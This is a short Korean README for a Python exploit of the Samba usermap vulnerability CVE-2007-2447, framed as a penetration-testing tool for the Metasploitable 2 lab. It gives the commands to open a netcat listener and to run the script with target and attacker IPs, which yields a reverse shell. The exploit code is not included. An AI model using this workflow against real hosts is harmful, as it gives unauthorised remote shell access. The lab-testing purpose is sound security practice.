
CVE-2007-2447 (Samba usermap)를 위한 Python 익스플로잇 스크립트로, 맞춤형 페이로드를 사용하여 리버스 셸을 전달하며, Metasploitable 2와 같은 취약한 대상에 대한 침투 테스트를 위해 설계되었습니다.
스크립트를 테스트하려면 여기에서 제공되는 가상 머신 "metasploitable 2"를 추천합니다. 익스플로잇이 작동하면 스크립트가 리버스 셸을 표시합니다. 연결을 받으려면 netcat 세션을 다음과 같이 열면 됩니다:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
그리고 netcat에서:
netcat -lnvp 1337
결과:
netcat:
alt text
스크립트에서:
alt text
저는 cheat-sheet에서 페이로드를 사용했습니다. 링크는 여기에서 확인할 수 있습니다. 다른 페이로드로 대체할 수 있습니다.